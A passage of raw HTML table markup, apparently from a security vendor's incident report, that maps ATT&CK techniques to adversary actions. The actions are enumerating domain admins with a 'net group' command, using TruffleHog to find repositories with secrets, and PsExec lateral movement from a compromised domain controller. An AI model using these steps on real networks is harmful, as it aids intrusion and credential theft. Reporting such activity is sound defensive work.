line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="595831671" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{233}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="31" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1654082187" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{61}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="889578341" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{241}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1069.002: Permission Groups Discovery: Domain Groups&#xA0;</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1770574646" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{248}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary used commands like net group &quot;domain admins&quot; /domain to find high-privilege accounts.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="2125534091" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{254}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="530768476" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{4}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="32" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="986215677" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{65}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="88225626" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{12}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1526: Cloud Service Discovery&#xA0;&#xA0;</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1289850368" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{19}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary ran the legitimate cybersecurity tool<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">TruffleHog</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>to discover repositories<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">containing</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">client secrets and personal information.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1617494787" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{26}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="33" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="641545692" paraeid="{bfbaa6bf-a8cb-417b-9dcc-1654684dd021}{133}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Lateral movement</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1519072446" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{56}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1021.002: Remote Services: SMB/Windows Admin Shares</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="587980627" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{63}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary used<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">PsExec</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">(communicated over SMB) to move laterally from the compromised domain controller to other servers.</span></span><span class="EOP 